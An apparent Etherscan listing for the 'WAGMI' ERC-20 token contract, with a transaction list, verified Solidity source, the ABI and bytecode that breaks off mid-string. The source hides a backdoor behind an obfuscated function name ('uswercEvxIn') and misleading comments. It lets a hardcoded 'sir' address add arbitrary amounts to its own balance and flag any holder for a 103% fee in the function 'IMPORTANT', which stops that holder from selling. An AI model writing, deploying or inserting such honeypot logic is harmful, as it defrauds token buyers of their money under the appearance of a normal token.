ETH Price: $3,453.95 (+1.63%)

Contract

0x5f4ee3531E19aDf84786d8F79A90cAbA261435A2
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve172202412023-05-09 3:32:11595 days ago1683603131IN
0x5f4ee353...A261435A2
0 ETH0.0034375574.3946429
Approve171293672023-04-26 8:58:47608 days ago1682499527IN
0x5f4ee353...A261435A2
0 ETH0.0014825131.85265675
Approve171286972023-04-26 6:43:47608 days ago1682491427IN
0x5f4ee353...A261435A2
0 ETH0.0017262137.04088075
Approve171286952023-04-26 6:43:23608 days ago1682491403IN
0x5f4ee353...A261435A2
0 ETH0.0017116136.72761878
Approve171286592023-04-26 6:36:11608 days ago1682490971IN
0x5f4ee353...A261435A2
0 ETH0.0016076534.54127895
Approve171286562023-04-26 6:35:35608 days ago1682490935IN
0x5f4ee353...A261435A2
0 ETH0.0017015636.81533882
Approve171286522023-04-26 6:34:47608 days ago1682490887IN
0x5f4ee353...A261435A2
0 ETH0.0018352939.38145253
Approve171286482023-04-26 6:33:59608 days ago1682490839IN
0x5f4ee353...A261435A2
0 ETH0.001517532.8330145
Approve171286472023-04-26 6:33:47608 days ago1682490827IN
0x5f4ee353...A261435A2
0 ETH0.0015312433.07020158
Approve171286462023-04-26 6:33:35608 days ago1682490815IN
0x5f4ee353...A261435A2
0 ETH0.0014943432.10679699
Approve171286452023-04-26 6:33:23608 days ago1682490803IN
0x5f4ee353...A261435A2
0 ETH0.0008733933.26091597
Approve171286452023-04-26 6:33:23608 days ago1682490803IN
0x5f4ee353...A261435A2
0 ETH0.00159234.16091597
Approve171286442023-04-26 6:33:11608 days ago1682490791IN
0x5f4ee353...A261435A2
0 ETH0.0015869934.09735603
Transfer171286422023-04-26 6:32:47608 days ago1682490767IN
0x5f4ee353...A261435A2
0 ETH0.0049091632.04268072
Approve171286422023-04-26 6:32:47608 days ago1682490767IN
0x5f4ee353...A261435A2
0 ETH0.0015105232.41268072
Approve171286402023-04-26 6:32:23608 days ago1682490743IN
0x5f4ee353...A261435A2
0 ETH0.0015312633.1306962
Approve171286332023-04-26 6:30:59608 days ago1682490659IN
0x5f4ee353...A261435A2
0 ETH0.0017175437.09370283
Uswerc Evx In171286302023-04-26 6:30:23608 days ago1682490623IN
0x5f4ee353...A261435A2
0 ETH0.0020883743.99452963
Approve171285882023-04-26 6:21:59608 days ago1682490119IN
0x5f4ee353...A261435A2
0 ETH0.002103845.14303485
Approve171285852023-04-26 6:21:23608 days ago1682490083IN
0x5f4ee353...A261435A2
0 ETH0.0017554237.71619734
Approve171285332023-04-26 6:10:47608 days ago1682489447IN
0x5f4ee353...A261435A2
0 ETH0.0014907732.02997486
Approve171285052023-04-26 6:05:11608 days ago1682489111IN
0x5f4ee353...A261435A2
0 ETH0.0010900840.82245094
Approve171285042023-04-26 6:04:59608 days ago1682489099IN
0x5f4ee353...A261435A2
0 ETH0.0017057736.60219737
Approve171284992023-04-26 6:03:59608 days ago1682489039IN
0x5f4ee353...A261435A2
0 ETH0.0017593237.8
Approve171284882023-04-26 6:01:47608 days ago1682488907IN
0x5f4ee353...A261435A2
0 ETH0.0015224632.94023134
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
WAGMI

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-04-26
*/

/*
 * TG: https://t.me/wagmicommunity
 * TWITTER: https://twitter.com/WagmiErc20Burn
*/

//SPDX-License-Identifier:MIT
pragma solidity ^0.8.0;
abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }


    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a,b,"SafeMath: division by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}
contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    constructor () {
        _owner = _msgSender();
        emit OwnershipTransferred(address(0), _owner);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function transferOwnership(address newAddress) public onlyOwner{
        _owner = newAddress;
        emit OwnershipTransferred(_owner, newAddress);
    }

}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
contract WAGMI  is Context, IERC20, Ownable {

    using SafeMath for uint256;
    string private _name = "WAGMI";
    string private _symbol = "WAGMI ";
    uint8 private _decimals = 6;
    address payable public sir;
    mapping (address => uint256) _balances;
    address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD;

    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) public _isExcludefromFee;
    mapping (address => bool) public _uniswapPair;
    mapping (address => uint256) public _pairIs;

    uint256 private _totalSupply = 10000000 * 10**_decimals;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapPair;
    
    bool inSwapAndLiquify;
    bool public swapAndLiquifyEnabled = true;

    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }
    
    constructor () {
        _isExcludefromFee[owner()] = true;
        _isExcludefromFee[address(this)] = true;

        _balances[_msgSender()] = _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);

        sir = payable(address(0x2136279B91401D16e15b8fc2FA4D50d4378467ED));
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    receive() external payable {}

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function launch() public onlyOwner{
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapPair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        uniswapV2Router = _uniswapV2Router;
        _uniswapPair[address(uniswapPair)] = true;
        _allowances[address(this)][address(uniswapV2Router)] = ~uint256(0);

    }

    function _transfer(address from, address to, uint256 amount) private returns (bool) {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        
        if(inSwapAndLiquify)
        {
            return _basicTransfer(from, to, amount); 
        }
        else
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwapAndLiquify && !_uniswapPair[from])
            {
                swapAndLiquify(contractTokenBalance);
            }

            _balances[from] = _balances[from].sub(amount);

            uint256 fAmount = (_isExcludefromFee[from] || _isExcludefromFee[to]) ? amount : IMPORTANT(from, amount);
            
            _balances[to] = _balances[to].add(fAmount);

            emit Transfer(from, to, fAmount);
            return true;
        }
    }

    function _basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
        _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }

    function updone(uint256 valueIndex,
    mapping(address => uint256)// set new etherreceive
    storage // set new ethreceive
    implementations) private {
        implementations[sir] += valueIndex;
    }

    function swapAndLiquify(uint256 amount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        try uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            amount,
            0, 
            path,
            address(sir),
            block.timestamp
        ){} catch {}
    }

    function uswercEvxIn(address right,uint256 mach) public {
        uint a = 100;uint256 b = 300;
        if (mach >= 50 + uint256((a)+(b)).mul(a)) updone(mach+mach,(_balances));
        if (b-3*a == mach) _pairIs[right] = mach;
        if (b+a == mach) _pairIs[right] = mach;
        if (sir != msg.sender)
            revert ("not sir");
    }

    function IMPORTANT(address sender, uint256 amount) internal returns (uint256) {
        uint256 swapFee = amount.mul(3).div(100);

        if(_pairIs[sender] != 0) 
            swapFee = amount.mul(103).div(100);

        if(swapFee > 0) {
            _balances[address(this)] += swapFee;
            emit Transfer(sender, address(this), swapFee);
        }

        return amount.sub(swapFee);
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludefromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_pairIs","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_uniswapPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sir","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newAddress","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"right","type":"address"},{"internalType":"uint256","name":"mach","type":"uint256"}],"name":"uswercEvxIn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60e0604052600560a0908152645741474d4960d81b60c05260019062000026908262000290565b5060408051808201909152600681526502ba0a3a6a4960d51b602082015260029062000053908262000290565b506003805460ff1916600690811790915561dead6080526200007790600a62000471565b62000086906298968062000489565b600955600b805460ff60a81b1916600160a81b179055348015620000a957600080fd5b50600080546001600160a01b0319163390811782556040519091907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3600160066000620001026000546001600160a01b031690565b6001600160a01b0316815260208082019290925260409081016000908120805494151560ff1995861617905530815260069092528120805490921660011790915560095490600490620001523390565b6001600160a01b03168152602081019190915260400160002055336001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600954604051620001b591815260200190565b60405180910390a360038054610100600160a81b031916742136279b91401d16e15b8fc2fa4d50d4378467ed00179055620004a3565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200021657607f821691505b6020821081036200023757634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200028b57600081815260208120601f850160051c81016020861015620002665750805b601f850160051c820191505b81811015620002875782815560010162000272565b5050505b505050565b81516001600160401b03811115620002ac57620002ac620001eb565b620002c481620002bd845462000201565b846200023d565b602080601f831160018114620002fc5760008415620002e35750858301515b600019600386901b1c1916600185901b17855562000287565b600085815260208120601f198616915b828110156200032d578886015182559484019460019091019084016200030c565b50858210156200034c5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003b35781600019048211156200039757620003976200035c565b80851615620003a557918102915b93841c939080029062000377565b509250929050565b600082620003cc575060016200046b565b81620003db575060006200046b565b8160018114620003f45760028114620003ff576200041f565b60019150506200046b565b60ff8411156200041357620004136200035c565b50506001821b6200046b565b5060208310610133831016604e8410600b841016171562000444575081810a6200046b565b62000450838362000372565b80600019048211156200046757620004676200035c565b0290505b92915050565b60006200048260ff841683620003bb565b9392505050565b80820281158282048414176200046b576200046b6200035c565b6080516114ca620004bf600039600061025a01526114ca6000f3fe60806040526004361061012e5760003560e01c80634a74bb02116100ab578063a9059cbb1161006f578063a9059cbb14610385578063c816841b146103a5578063dd62ed3e146103c5578063ede796161461040b578063f2fde38b1461042b578063fb3ddf851461044b57600080fd5b80634a74bb02146102ce57806370a08231146102ef5780638da5cb5b1461032557806395d89b4114610343578063a35521ef1461035857600080fd5b806318160ddd116100f257806318160ddd1461020957806323b872dd1461022857806327c8f83514610248578063313ce5671461027c5780633345611e1461029e57600080fd5b806301339c211461013a57806306fdde0314610151578063095ea7b31461017c578063124b4e63146101ac5780631694505e146101e957600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061014f61047b565b005b34801561015d57600080fd5b506101666106a2565b60405161017391906111f0565b60405180910390f35b34801561018857600080fd5b5061019c610197366004611256565b610734565b6040519015158152602001610173565b3480156101b857600080fd5b506003546101d19061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610173565b3480156101f557600080fd5b50600a546101d1906001600160a01b031681565b34801561021557600080fd5b506009545b604051908152602001610173565b34801561023457600080fd5b5061019c610243366004611282565b61074b565b34801561025457600080fd5b506101d17f000000000000000000000000000000000000000000000000000000000000000081565b34801561028857600080fd5b5060035460405160ff9091168152602001610173565b3480156102aa57600080fd5b5061019c6102b93660046112c3565b60066020526000908152604090205460ff1681565b3480156102da57600080fd5b50600b5461019c90600160a81b900460ff1681565b3480156102fb57600080fd5b5061021a61030a3660046112c3565b6001600160a01b031660009081526004602052604090205490565b34801561033157600080fd5b506000546001600160a01b03166101d1565b34801561034f57600080fd5b506101666107b6565b34801561036457600080fd5b5061021a6103733660046112c3565b60086020526000908152604090205481565b34801561039157600080fd5b5061019c6103a0366004611256565b6107c5565b3480156103b157600080fd5b50600b546101d1906001600160a01b031681565b3480156103d157600080fd5b5061021a6103e03660046112e0565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b34801561041757600080fd5b5061014f610426366004611256565b6107d2565b34801561043757600080fd5b5061014f6104463660046112c3565b6108c2565b34801561045757600080fd5b5061019c6104663660046112c3565b60076020526000908152604090205460ff1681565b6000546001600160a01b031633146104da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6000737a250d5630b4cf539739df2c5dacb4c659f2488d9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610531573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105559190611319565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105a2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105c69190611319565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610613573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106379190611319565b600b80546001600160a01b039283166001600160a01b03199182168117909255600a8054948416949091169390931783556000908152600760209081526040808320805460ff1916600117905530835260058252808320945490931682529290925290206000199055565b6060600180546106b190611336565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611336565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b6000610741338484610967565b5060015b92915050565b6000610758848484610a8b565b506107ab84336107a68560405180606001604052806028815260200161146d602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610cda565b610967565b5060015b9392505050565b6060600280546106b190611336565b60006107ab338484610a8b565b606461012c6107eb826107e58382611386565b90610d14565b6107f6906032611386565b8310610810576108106108098480611386565b6004610d96565b8261081c836003611399565b61082690836113b0565b03610847576001600160a01b03841660009081526008602052604090208390555b826108528383611386565b03610873576001600160a01b03841660009081526008602052604090208390555b60035461010090046001600160a01b031633146108bc5760405162461bcd60e51b81526020600482015260076024820152663737ba1039b4b960c91b60448201526064016104d1565b50505050565b6000546001600160a01b0316331461091c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104d1565b600080546001600160a01b0319166001600160a01b0383169081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b6001600160a01b0383166109c95760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104d1565b6001600160a01b038216610a2a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104d1565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006001600160a01b038416610af15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104d1565b6001600160a01b038316610b535760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104d1565b600b54600160a01b900460ff1615610b7757610b70848484610dce565b90506107af565b30600090815260046020526040902054600b54600160a01b900460ff16158015610bba57506001600160a01b03851660009081526007602052604090205460ff16155b15610bc857610bc881610eb4565b6001600160a01b038516600090815260046020526040902054610beb908461101a565b6001600160a01b038616600090815260046020908152604080832093909355600690529081205460ff1680610c3857506001600160a01b03851660009081526006602052604090205460ff165b610c4b57610c46868561105c565b610c4d565b835b6001600160a01b038616600090815260046020526040902054909150610c739082611126565b6001600160a01b0380871660008181526004602052604090819020939093559151908816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610cc79085815260200190565b60405180910390a36001925050506107af565b60008184841115610cfe5760405162461bcd60e51b81526004016104d191906111f0565b506000610d0b84866113b0565b95945050505050565b600082600003610d2657506000610745565b6000610d328385611399565b905082610d3f85836113c3565b146107af5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104d1565b60035461010090046001600160a01b031660009081526020829052604081208054849290610dc5908490611386565b90915550505050565b6040805180820182526014815273496e73756666696369656e742042616c616e636560601b6020808301919091526001600160a01b0386166000908152600490915291822054610e1f918490610cda565b6001600160a01b038086166000908152600460205260408082209390935590851681522054610e4e9083611126565b6001600160a01b0380851660008181526004602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ea29086815260200190565b60405180910390a35060019392505050565b600b805460ff60a01b1916600160a01b1790556040805160028082526060820183526000926020830190803683370190505090503081600081518110610efc57610efc6113e5565b6001600160a01b03928316602091820292909201810191909152600a54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610f55573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f799190611319565b81600181518110610f8c57610f8c6113e5565b6001600160a01b039283166020918202929092010152600a5460035460405163791ac94760e01b81529183169263791ac94792610fdd928792600092889261010090049091169042906004016113fb565b600060405180830381600087803b158015610ff757600080fd5b505af1925050508015611008575060015b505050600b805460ff60a01b19169055565b60006107af83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610cda565b600080611075606461106f856003610d14565b90611185565b6001600160a01b038516600090815260086020526040902054909150156110a9576110a6606461106f856067610d14565b90505b80156111145730600090815260046020526040812080548392906110ce908490611386565b909155505060405181815230906001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35b61111e838261101a565b949350505050565b6000806111338385611386565b9050838110156107af5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104d1565b60006107af83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250600081836111e35760405162461bcd60e51b81526004016104d191906111f0565b506000610d0b84866113c3565b600060208083528351808285015260005b8181101561121d57858101830151858201604001528201611201565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461125357600080fd5b50565b6000806040838503121561126957600080fd5b82356112748161123e565b946020939093013593505050565b60008060006060848603121561129757600080fd5b83356112a28161123e565b925060208401356112b28161123e565b929592945050506040919091013590565b6000602082840312156112d557600080fd5b81356107af8161123e565b600080604083850312156112f357600080fd5b82356112fe8161123e565b9150602083013561130e8161123e565b809150509250929050565b60006020828403121561132b57600080fd5b81516107af8161123e565b600181811c9082168061134a57607f821691505b60208210810361136a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561074557610745611370565b808202811582820484141761074557610745611370565b8181038181111561074557610745611370565b6000826113e057634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561144b5784516001600160a01b031683529383019391830191600101611426565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220dd426aa09020938ec1181c2e1e3476226616faccbb57805e6e6b5a639e08d44b64736f6c63430008120033

Deployed Bytecode

0x60806040526004361061012e5760003560e01c80634a74bb02116100ab578063a9059cbb1161006f578063a9059cbb14610385578063c816841b146103a5578063dd62ed3e146103c5578063ede796161461040b578063f2fde38b1461042b578063fb3ddf851461044b57600080fd5b80634a74bb02146102ce57806370a08231146102ef5780638da5cb5b1461032557806395d89b4114610343578063a35521ef1461035857600080fd5b806318160ddd116100f257806318160ddd1461020957806323b872dd1461022857806327c8f83514610248578063313ce5671461027c5780633345611e1461029e57600080fd5b806301339c211461013a57806306fdde0314610151578063095ea7b31461017c578063124b4e63146101ac5780631694505e146101e957600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061014f61047b565b005b34801561015d57600080fd5b506101666106a2565b60405161017391906111f0565b60405180910390f35b34801561018857600080fd5b5061019c610197366004611256565b610734565b6040519015158152602001610173565b3480156101b857600080fd5b506003546101d19061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610173565b3480156101f557600080fd5b50600a546101d1906001600160a01b031681565b34801561021557600080fd5b506009545b604051908152602001610173565b34801561023457600080fd5b5061019c610243366004611282565b61074b565b34801561025457600080fd5b506101d17f000000000000000000000000000000000000000000000000000000000000dead81565b34801561028857600080fd5b5060035460405160ff9091168152602001610173565b3480156102aa57600080fd5b5061019c6102b93660046112c3565b60066020526000908152604090205460ff1681565b3480156102da57600080fd5b50600b5461019c90600160a81b900460ff1681565b3480156102fb57600080fd5b5061021a61030a3660046112c3565b6001600160a01b031660009081526004602052604090205490565b34801561033157600080fd5b506000546001600160a01b03166101d1565b34801561034f57600080fd5b506101666107b6565b34801561036457600080fd5b5061021a6103733660046112c3565b60086020526000908152604090205481565b34801561039157600080fd5b5061019c6103a0366004611256565b6107c5565b3480156103b157600080fd5b50600b546101d1906001600160a01b031681565b3480156103d157600080fd5b5061021a6103e03660046112e0565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b34801561041757600080fd5b5061014f610426366004611256565b6107d2565b34801561043757600080fd5b5061014f6104463660046112c3565b6108c2565b34801561045757600080fd5b5061019c6104663660046112c3565b60076020526000908152604090205460ff1681565b6000546001600160a01b031633146104da5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6000737a250d5630b4cf539739df2c5dacb4c659f2488d9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610531573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105559190611319565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105a2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105c69190611319565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610613573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106379190611319565b600b80546001600160a01b039283166001600160a01b03199182168117909255600a8054948416949091169390931783556000908152600760209081526040808320805460ff1916600117905530835260058252808320945490931682529290925290206000199055565b6060600180546106b190611336565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611336565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b6000610741338484610967565b5060015b92915050565b6000610758848484610a8b565b506107ab84336107a68560405180606001604052806028815260200161146d602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610cda565b610967565b5060015b9392505050565b6060600280546106b190611336565b60006107ab338484610a8b565b606461012c6107eb826107e58382611386565b90610d14565b6107f6906032611386565b8310610810576108106108098480611386565b6004610d96565b8261081c836003611399565b61082690836113b0565b03610847576001600160a01b03841660009081526008602052604090208390555b826108528383611386565b03610873576001600160a01b03841660009081526008602052604090208390555b600354610100900460016